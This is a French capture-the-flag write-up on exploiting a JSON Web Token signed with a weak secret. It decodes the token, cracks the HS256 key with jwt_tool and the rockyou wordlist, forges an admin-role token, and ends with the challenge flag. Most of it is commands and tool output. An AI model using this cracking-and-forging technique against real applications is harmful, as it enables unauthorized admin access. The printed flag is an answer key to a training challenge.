Writeup
=======

Exploitation d'un JWT dont la clé secrète est faible.

Exploitation&nbsp;:

```bash
pushd exploit/
```

On accède au site, on utilise le login et mot de passe qu'on nous donne en démo, on récupère le token `ZXlKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUo5LmV5SjFjMlZ5SWpvaWRYTmxjaUlzSW5KdmJHVWlPaUoxYzJWeUluMC5aRWVtcmhRUTc1aGFJeEhOd21wRG5ZSnZDWExsMGpDM2Nmd2xqTVJ1bHpn`.

On décode la base64 pour récupérer le JWT&nbsp;:

```bash
echo "ZXlKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUo5LmV5SjFjMlZ5SWpvaWRYTmxjaUlzSW5KdmJHVWlPaUoxYzJWeUluMC5aRWVtcmhRUTc1aGFJeEhOd21wRG5ZSnZDWExsMGpDM2Nmd2xqTVJ1bHpn" | base64 -d -
```

On bruteforce le secret&nbsp;:

```bash
python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoidXNlciIsInJvbGUiOiJ1c2VyIn0.ZEemrhQQ75haIxHNwmpDnYJvCXLl0jC3cfwljMRulzg /usr/share/wordlists/rockyou.txt
```

Procédure (plus que guidée)&nbsp;:

```raw
Token header values:
[+] typ = JWT
[+] alg = HS256

Token payload values:
[+] user = user
[+] role = user

######################################################
# Options:                                           #
# 1: Check CVE-2015-2951 - alg=None vulnerability    #
# 2: Check for Public Key bypass in RSA mode         #
# 3: Check signature against a key                   #
# 4: Crack signature with supplied dictionary file   #
# 5: Tamper with payload data (key required to sign) #
# 0: Quit                                            #
######################################################

Please make a selection (1-5)
> 4

Loading key dictionary...
File loaded: /usr/share/wordlists/rockyou.txt
Testing 14344381 passwords...
[+] 221bbs is the CORRECT key!
```

On forge un nouveau token avec le role `admin`&nbsp;:

```bash
python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoidXNlciIsInJvbGUiOiJ1c2VyIn0.ZEemrhQQ75haIxHNwmpDnYJvCXLl0jC3cfwljMRulzg
```

Procédure (plus que guidée)&nbsp;:

```raw
Token header values:
[+] typ = JWT
[+] alg = HS256

Token payload values:
[+] user = user
[+] role = user

######################################################
# Options:                                           #
# 1: Check CVE-2015-2951 - alg=None vulnerability    #
# 2: Check for Public Key bypass in RSA mode         #
# 3: Check signature against a key                   #
# 4: Crack signature with supplied dictionary file   #
# 5: Tamper with payload data (key required to sign) #
# 0: Quit                                            #
######################################################

Please make a selection (1-5)
> 5

Token payload values:
[1] user = user
[2] role = user
[0] Continue to next step

> 1
> Creased

> 2
> admin

> 0

Token Signing:
[1] Sign token with known key
[2] Strip signature from token vulnerable to CVE-2015-2951
[3] Sign with Public Key bypass vulnerability

Please select an option from above (1-3):
> 1

Please enter the known key:
> 221bbs

Please enter the keylength:
[1] HMAC-SHA256
[2] HMAC-SHA384
[3] HMAC-SHA512
> 1

Your new forged token:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiQ3JlYXNlZCIsInJvbGUiOiJhZG1pbiJ9.4kCW8+9T2TCDIIqX9y8RLXfjy19TPMlGvT4+iEZZSU4
```

On encode le nouveau token en base64&nbsp;:

```bash
echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiQ3JlYXNlZCIsInJvbGUiOiJhZG1pbiJ9.4kCW8+9T2TCDIIqX9y8RLXfjy19TPMlGvT4+iEZZSU4" | base64 -w0 -
```

On utilise ce token sur l'application&nbsp;: `ZXlKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUo5LmV5SjFjMlZ5SWpvaVEzSmxZWE5sWkNJc0luSnZiR1VpT2lKaFpHMXBiaUo5LjRrQ1c4KzlUMlRDRElJcVg5eThSTFhmankxOVRQTWxHdlQ0K2lFWlpTVTQK`.

```bash
popd
```

Flag&nbsp;: `ENSIBS{7h3_5c13Nc3_0f_d3DuC710n}`
